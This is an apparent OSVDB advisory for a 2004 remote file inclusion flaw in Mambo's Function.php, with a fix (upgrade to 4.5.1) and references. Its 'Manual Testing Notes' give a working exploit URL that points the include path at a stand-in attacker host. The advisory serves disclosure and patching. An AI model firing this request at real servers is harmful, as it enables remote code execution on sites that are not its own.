Mambo Function.php Arbitrary Command Execution

2004-09-18T00:00:00
ID OSVDB:10180
Type osvdb
Reporter Joxean Koret(joxeankoret@yahoo.es)
Modified 2004-09-18T00:00:00

Description

Vulnerability Description

Mambo contains a flaw that may allow a remote attacker to execute arbitrary commands. The problem is that the function.php script does not validate the mosConfig_absolute_path variable which can be changed to include and execute code from a remote location. It is possible that the flaw may allow a remote attacker to execute arbitrary commands resulting in a loss of integrity.

Solution Description

Upgrade to version 4.5.1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Short Description

Mambo contains a flaw that may allow a remote attacker to execute arbitrary commands. The problem is that the function.php script does not validate the mosConfig_absolute_path variable which can be changed to include and execute code from a remote location. It is possible that the flaw may allow a remote attacker to execute arbitrary commands resulting in a loss of integrity.

Manual Testing Notes

http://[victim]/includes/Cache/Lite/Function.php?mosConfig_absolute_path=http://fucking.site.com/

References:

Vendor URL: http://mamboserver.com/ Security Tracker: 1011365 Related OSVDB ID: 10179 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-09/0245.html ISS X-Force ID: 17449 CVE-2004-1693 Bugtraq ID: 11220